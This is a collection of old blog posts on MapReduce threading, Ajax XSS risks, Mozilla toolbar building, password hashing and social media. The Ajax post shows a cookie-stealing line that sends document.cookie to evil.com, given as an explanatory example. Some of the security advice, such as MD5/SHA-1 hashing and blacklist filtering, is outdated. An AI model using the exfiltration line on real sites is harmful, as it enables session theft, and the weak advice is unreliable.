Thursday, March 12, 2009

MapReduce Framework (Article 2) : Distributed computing

Distributed computing - CPUs with separate memory. All such CPUs are connected by some kind of network (Ethernet, Gigabit Ethernet, WAN, etc.).

The basic element of distributed computing is to identify the subproblems that can run simultaneously without any data dependency. For example, in an animated movie all frames can be rendered simultaneously, because rendering frame #10 does not need any data from frame #11.
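
Because the frames are independent, they can be handed out to nodes in any way we like. The sketch below assumes a simple round-robin policy; the function name assignFrames and the policy itself are illustrative choices, not something a particular framework prescribes.

```javascript
// Distribute frames 1..frameCount over nodeCount nodes, round-robin.
// No frame depends on another, so any assignment is valid.
function assignFrames(frameCount, nodeCount) {
  const assignments = Array.from({ length: nodeCount }, () => []);
  for (let frame = 1; frame <= frameCount; frame++) {
    assignments[(frame - 1) % nodeCount].push(frame);
  }
  return assignments;
}
```

For 7 frames and 3 nodes this gives node 0 the frames 1, 4, 7, node 1 the frames 2, 5 and node 2 the frames 3, 6.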

In a distributed computing environment, there are multiple processes running on hundreds of CPUs. They work on a copy of the original input; nobody modifies the original. As the computation proceeds, data is transferred between nodes. We mainly use the TCP/IP protocol for this.

Challenges in distributed computing environment
  1. Reliable messaging is a MUST.
  2. Data moves from one node to another, and the intermediate nodes can read it along with the IP headers. So you either need to trust every intermediate node or use a protocol that encrypts the data but leaves the IP headers readable.
  3. We need to make sure all data packets originated from the host machine.
  4. We need to make sure data sits close to the logical computing unit, so the position of the router is very important.
Hadoop (hadoop.apache.org/core/) is an open source Java implementation of a distributed computing platform for the MapReduce framework that supports the above-mentioned features. I will discuss the Hadoop Distributed File System in article #4.

MapReduce Framework (Article 1) : Parallel computing

Parallel Computing - Multiple CPUs in one box. All CPUs share the same memory.

Now the question is how to achieve parallelism in a single box. By using threads. If we call a function foo from the main thread, foo's frame is pushed on top of main's frame on the same process stack.

So the main function has to wait till foo ends. If you spawn a thread, the thread has its own stack and does not block execution of the main function. So by using threads, we can start multiple flows of execution, and in a multi-CPU system those threads can run simultaneously.





Parallelisation pitfalls
  1. How do we assign work units to worker threads?
  2. What if we have more work units than worker threads?
  3. How do we aggregate the results at the end?
  4. How do we know all worker threads have finished?
  5. What if the work cannot be divided into separate tasks?
Each of these problems represents a point at which multiple threads communicate with one another or access a shared resource. Any memory that can be used by multiple threads must be associated with a synchronization system.

The most important concept in Synchronization is

Race condition
Each thread is racing to complete, and depending on which one wins, the outcome will be different. We need to make sure that this condition never arises.

Thread 1

void foo() {
    x++;
    y = x;
}

Thread 2

void bar() {
    y++;
    x = y;
}

Here x and y are two shared variables. We don't know how the OS will schedule the threads, and the output differs depending on the execution order. To fix the issue we need to make sure only one thread at a time can work on the shared variables. This can be achieved by using a semaphore.
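
To see why the execution order matters, the sketch below replays the two steps of foo and bar in a fixed schedule. It is only a single-threaded simulation written in JavaScript: the helper names makeSteps and run are made up for illustration, both variables are assumed to start at 0, and x++ is treated as one indivisible step, which real threads do not guarantee.

```javascript
// Split each thread body into its two statements so they can be interleaved by hand.
function makeSteps(state) {
  return {
    foo: [() => { state.x++; }, () => { state.y = state.x; }],
    bar: [() => { state.y++; }, () => { state.x = state.y; }],
  };
}

// Execute the statements in the order given by schedule,
// e.g. ["foo", "bar", "foo", "bar"] alternates between the two threads.
function run(schedule) {
  const state = { x: 0, y: 0 }; // assumed initial values
  const steps = makeSteps(state);
  const next = { foo: 0, bar: 0 }; // index of each thread's next statement
  for (const thread of schedule) {
    steps[thread][next[thread]++]();
  }
  return state;
}
```

Running foo to completion before bar, run(["foo", "foo", "bar", "bar"]), ends with x = 2 and y = 2, while alternating the statements, run(["foo", "bar", "foo", "bar"]), ends with x = 1 and y = 1.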

Semaphore

To make an object thread-safe, bind one semaphore to that object. A semaphore has two synchronization primitives (special variables or methods that are guaranteed to be accessed by only one thread at a time).
  1. lock() - Each semaphore has a queue associated with it. A call to lock() while the semaphore is already locked makes the calling thread wait, and the thread is added to the queue.
  2. unlock() - releases the semaphore and wakes up a thread waiting in the queue.
By using a semaphore, we can modify the above programs so that the race condition never arises.

Thread 1

void foo() {
    sem.lock();
    x++;
    y = x;
    sem.unlock();
}

Thread 2

void bar() {
    sem.lock();
    y++;
    x = y;
    sem.unlock();
}

A semaphore guarantees that only one thread executes the block at a time; however, it is not sufficient to guarantee a particular order of execution (foo should execute before bar).

This can be achieved by using a condition variable. A condition variable notifies threads that a particular condition has been met. It has two methods
  1. wait() - waiting on a condition variable puts the thread to sleep.
  2. notify() - notifying on a condition variable wakes up a thread that is waiting on it.
Now to achieve the flow, we introduce one boolean fooFinished (safe here because it is only read and written while holding sem) and one condition variable fooFinishedCV.

Thread 1

void foo() {
    sem.lock();
    x++;
    y = x;
    fooFinished = true;
    sem.unlock();
    fooFinishedCV.notify();
}

Thread 2

void bar() {
    sem.lock();
    // Re-check the flag after every wake-up: wait() may return spuriously.
    while (!fooFinished) {
        fooFinishedCV.wait(sem);
    }
    y++;
    x = y;
    sem.unlock();
}

While waiting on a condition variable the thread must release the lock (which is why sem is passed to wait()); otherwise foo could never acquire it and neither thread would make progress. This situation is called a deadlock.

So there are many things to look into when using threads to achieve parallelism. On top of that, physical limitations prevent us from attaching hundreds of CPUs to a single box. So if you want to process terabytes of data in X hours, parallel computing alone won't help you.

In my next article I will discuss the distributed computing platform, which is the main concept behind Google's MapReduce framework for processing huge datasets.

Saturday, July 7, 2007

Ajax Applications :: Security threats

Ajax (Asynchronous JavaScript and XML) is the key technology in Web 2.0. In the Web 2.0 world, Ajax changes the presentation of web pages by dynamically loading data from the server. But these applications also become vulnerable to attack. A hacker who can tamper with the server response can insert malicious code into it. But how?

Let's say you are dynamically loading a user photo in a social networking environment. You are expecting a JSON response like this
{ "user_avatar": "./img/avatar1.jpg" }
and once you have the data, you directly change the src of the user photo section using the DOM
document.getElementById("user_photo").src = response.user_avatar;

So simple... but there is a security hole that can allow a hacker to enter your home page without logging in.

Step 1 : The hacker modifies the JSON response. Now the response looks like
{ "user_avatar": "http://evil.com/steal?cookie=" + document.cookie }

Step 2 : You replace the user_photo with this one.
document.getElementById("user_photo").src = response.user_avatar;

Step 3 : If the response is turned into an object with eval(), the browser first evaluates document.cookie and then tries to load the resulting URL. It calls the evil.com site with your browser cookie. If you store the user password in a cookie, it becomes accessible to the hacker. He also gets the session ID from the cookie and can use it to enter the user's home page without logging in.

Example

<html>
<head>
<script language="javascript">
function test() {
document.getElementById("avatar").src="http://evil.com/steal?cookie="+ document.cookie;
}
</script>
</head>

<body >

<input type="button" value="Test" onclick="test()">
<img src="" id="avatar" alt="User avatar">
</body>
</html>



This is called an XSS (cross-site scripting) attack. To prevent it, always validate your input and your response output. Remove any <script> tags before performing an operation such as evaluating the response with the eval() function. document.cookie is also a very dangerous string to have in an Ajax response. So it is recommended to keep a list of potentially dangerous strings and to pass the response through a filter that removes them before evaluating it.

Once you have secured the JSON response string, convert it into a JSON object and perform your operation.
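
One possible way to do the conversion and validation is sketched below. It assumes the response is parsed with JSON.parse, which treats the text purely as data and rejects expressions such as the one in Step 1, and that avatar images are only ever served from the page's own origin. The function name safeAvatarUrl and the same-origin rule are illustrative assumptions, not part of any library.

```javascript
// Parse the response text as data only, and accept the avatar URL
// only if it resolves to the same origin as the page itself.
function safeAvatarUrl(responseText, pageUrl) {
  let data;
  try {
    data = JSON.parse(responseText); // never executes code, unlike eval()
  } catch (err) {
    return null; // not valid JSON, e.g. the text contains an expression
  }
  if (data === null || typeof data.user_avatar !== "string") {
    return null;
  }
  let url;
  try {
    url = new URL(data.user_avatar, pageUrl); // resolve relative paths
  } catch (err) {
    return null;
  }
  return url.origin === new URL(pageUrl).origin ? url.href : null;
}
```

In a browser, pageUrl would typically be window.location.href, and the img src would only be updated when the function returns a non-null value.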

Monday, July 2, 2007

Creating Mozilla toolbar

Last month I implemented a custom Mozilla toolbar for our application using XUL (XML User Interface Language). It's an amazing framework. Let's create a sample toolbar to detect and collect images from any website.

Setup - Workspace directory structure

toolbar (TOP Level Directory)
--chrome
----content
----skin
--install.rdf (empty file)
--chrome.manifest (empty file)

The Mozilla browser has the following sections
  1. toolbar
  2. menubar
  3. window content
  4. status bar

(toolbar+menubar+status bar) = part of chrome

The Mozilla browser uses XUL for its UI. The default XUL file is browser.xul. You can add extra functionality by providing a custom XUL file, so almost every Mozilla extension has one. This file is used to add toolbar buttons, right-click context menu entries, etc.


Step 1
Add a XUL file (overlay.xul, in the content directory) that overlays the browser's default UI. It adds one entry, "Toolbar::Collect it", to the right-click context menu.










Step 2
When you click on the context menu entry, the JavaScript collect function is called. It lives in an overlay.js file, which is also in the content directory.

// Set up the context-menu hook once the browser window has loaded.
window.addEventListener("load", initToolbar, true);

// Console service, used here to log debug messages.
var aConsoleService = Components.classes["@mozilla.org/consoleservice;1"]
    .getService(Components.interfaces.nsIConsoleService);

function initToolbar() {
    var menu = document.getElementById("contentAreaContextMenu");
    menu.addEventListener("popupshowing", contextPopupShowing, false);
}

// Show our menu item only when the user right-clicked an image.
function contextPopupShowing() {
    var menuitem = document.getElementById("zoomarena-menu");
    if (menuitem) {
        menuitem.hidden = !gContextMenu.onImage;
    }
}

// Open the clicked image in a new tab and switch to that tab.
function collect() {
    aConsoleService.logStringMessage("Collect sample");
    if (gContextMenu.onImage) {
        var img = gContextMenu.target;
        if (img) {
            var newTab = gBrowser.addTab(img.src);
            gBrowser.selectedTab = newTab;
        }
    }
}

Here we register the listener function "initToolbar", which runs when the browser window has loaded. In initToolbar we add one more listener, which is called when the context menu is about to become visible. That listener checks whether the context menu was opened on an image: if so, it shows "Toolbar::Collect it", otherwise it hides it.

We also define the collect() function used in overlay.xul. It gets the img src and opens it in a new browser tab.

Step 3
You are almost done. Define a chrome.manifest file (in the toolbar folder) to register the new overlay. You can also use this file to register a custom skin (the icons and CSS file used by the toolbar). Here the chrome/skin folder is empty, so we will just register the new overlay.

content toolbar jar:chrome/toolbar.jar!/content/
overlay chrome://browser/content/browser.xul chrome://toolbar/content/overlay.xul

Step 4
Define the install.rdf file. This file is self-explanatory.





















Step 5
Packaging. Here is the script (xp.bat) to package the toolbar and distribute it as an xpi file.

cd chrome
rm toolbar.jar
zip -r toolbar.jar content/
cd ..
rm toolbar.xpi
zip -r toolbar.xpi chrome.manifest install.rdf chrome/toolbar.jar


Final directory / file structure

toolbar
--xp.bat
--chrome.manifest
--install.rdf
--chrome
----content
------overlay.js
------overlay.xul
----skin

Execute xp.bat. This creates toolbar.xpi in the toolbar directory. Now you are ready to distribute the package.

Sunday, July 1, 2007

Building a secure login system

Sometimes we store plain text user passwords in the database. If someone gets access to your database, he can damage the whole system. So it's recommended to hash the password with a one-way hash algorithm before storing it.

A hash value is, for practical purposes, unique to a sequence of input data. The beauty of a one-way hash algorithm is that we can easily compute the hash value of a piece of data, but it is almost impossible to get back the original data from the hash value. There are a number of hash functions available

  1. SHA-1 - Output = 160 bits
  2. SHA-256 - Output = 256 bits
  3. SHA-512 - Output = 512 bits

MD5 (Message Digest algorithm 5) is also a widely used hashing algorithm. Its output size is 128 bits. The SHA family is generally regarded as the successor of MD5.

Storing User detail

Let's say your application collects the following parameters while registering a new user
  1. name
  2. password
  3. email
So in the backend controller code, you should calculate the password hash using any of the above-mentioned algorithms before storing the password in the database.

SHA1 hash - PHP function - sha1($_POST['password'])
MD5 hash - PHP function - md5($_POST['password'])

User Authentication

When the user logs in, he provides a username and a plain text password. Calculate the hash value again with the same algorithm you used at registration. As the hash value is practically unique for a set of input characters, a matching hash value means the password is correct, so perform the authentication success logic.

NOTE:: It is not safe to send the plain text user password over HTTP. An attacker can easily capture that HTTP packet and extract the password. Always use SSL when sending user credentials.


Weaknesses

By adding a password hash you have made the hacker's life much more difficult. But it's not yet a foolproof solution. If the hacker somehow gets access to the database, he will try to crack the hashes. A fast CPU can hash a very large number of strings per second. So the hacker will generate candidate strings and their hash values. If one of the candidates produces the same hash output, that candidate is the user's password.
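
The attack described above can be sketched in a few lines. This assumes Node.js and its built-in crypto module, and uses a fixed candidate list instead of a random string generator; the names sha1Hex and crackHash are made up for illustration.

```javascript
const crypto = require("crypto");

// Hash a candidate the same way the application hashed the password.
function sha1Hex(text) {
  return crypto.createHash("sha1").update(text).digest("hex");
}

// Try each candidate until one produces the stolen hash.
function crackHash(stolenHash, candidates) {
  for (const candidate of candidates) {
    if (sha1Hex(candidate) === stolenHash) {
      return candidate; // this candidate is the password
    }
  }
  return null; // no candidate matched
}
```

Note that with plain hashes every user who chose the same password has the same stored value, so one successful guess exposes all of those accounts at once.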

Follow these steps to fix this security hole
  1. Generate a random string - RANDOM_STRING
  2. The user has entered "xyz" as the password during registration.
  3. Append the generated string to the password and then calculate the hash value. So instead of storing HASH_ALGO($_POST['password']), store HASH_ALGO($_POST['password'].RANDOM_STRING)
  4. Store the RANDOM_STRING in the database.
  5. Every time the user logs in, use the stored RANDOM_STRING to calculate the hash: HASH_ALGO(USER_CREDENTIAL.RANDOM_STRING). Then compare this hash value with the stored password hash. If it matches, perform the authentication success logic and some extra steps to confuse the hacker
      • At the time of verifying the user credentials, you have the plain text password.
      • Once it is verified, generate another random string and compute
        HASH_ALGO(USER_CREDENTIAL.NEW_RANDOM_STRING) = XYZ
      • Update the database fields
        password_hash and random_string
      • Thus we have updated the random string and the password hash value but not the actual password. Next time the new random string will be used to validate the user credentials.
      • This process changes the user's password hash value every time the user logs in, which will confuse the hacker. It also makes almost all password hash values unique, which in turn reduces the damage if the database leaks.
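
The steps above can be sketched as follows, assuming Node.js with its built-in crypto module and SHA-256 standing in for HASH_ALGO. The function names createCredential and verifyCredential and the 16-byte random string are illustrative assumptions. In practice a dedicated password-hashing function such as crypto.scryptSync is generally a better choice than a single hash round.

```javascript
const crypto = require("crypto");

// Steps 1, 3 and 4: generate a per-user random string and hash password + random string.
function createCredential(password) {
  const salt = crypto.randomBytes(16).toString("hex"); // RANDOM_STRING
  const hash = crypto.createHash("sha256").update(password + salt).digest("hex");
  return { salt, hash }; // both values would be stored in the user's row
}

// Step 5: recompute the hash with the stored random string and compare.
function verifyCredential(password, stored) {
  const candidate = crypto.createHash("sha256").update(password + stored.salt).digest();
  const expected = Buffer.from(stored.hash, "hex");
  // timingSafeEqual requires equal lengths and avoids leaking where the mismatch is.
  return candidate.length === expected.length &&
    crypto.timingSafeEqual(candidate, expected);
}
```

To rotate the stored values after a successful login, call createCredential again with the plain text password that was just verified and overwrite the password_hash and random_string fields with the result.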
Things to remember
  • Store password hash value.
  • Use SSL to transmit plain text password.
  • Ask user to change the password after every x number of days.
  • Use the random string to make all the password hash values unique which will reduce database damage.
  • Use random string algorithm to change database password_hash value every time user logs in. This will confuse the hacker.

Impact of Social Media

Social networking is really changing the way people spend time on the internet. People love to create a virtual social community around them, and some of them prefer doing activities in their virtual world to doing them in the real world. It's not a new concept, but the way we present data is different. Take instant messengers as an example: each one is a private social network where you have access to your friends' profiles only. But we want to go beyond that. Nowadays social networking sites help people reach out to someone they have met or never met before.

It's just the starting point. Soon we are going to see lots of new innovations in that direction. Web 2.0 has already added a new dimension to web applications.

India's mobile market is booming. The total number of mobile phone subscribers will cross 200 million very soon. Will mobile social networking become the next big thing? The opportunity is huge. Let's wait and watch.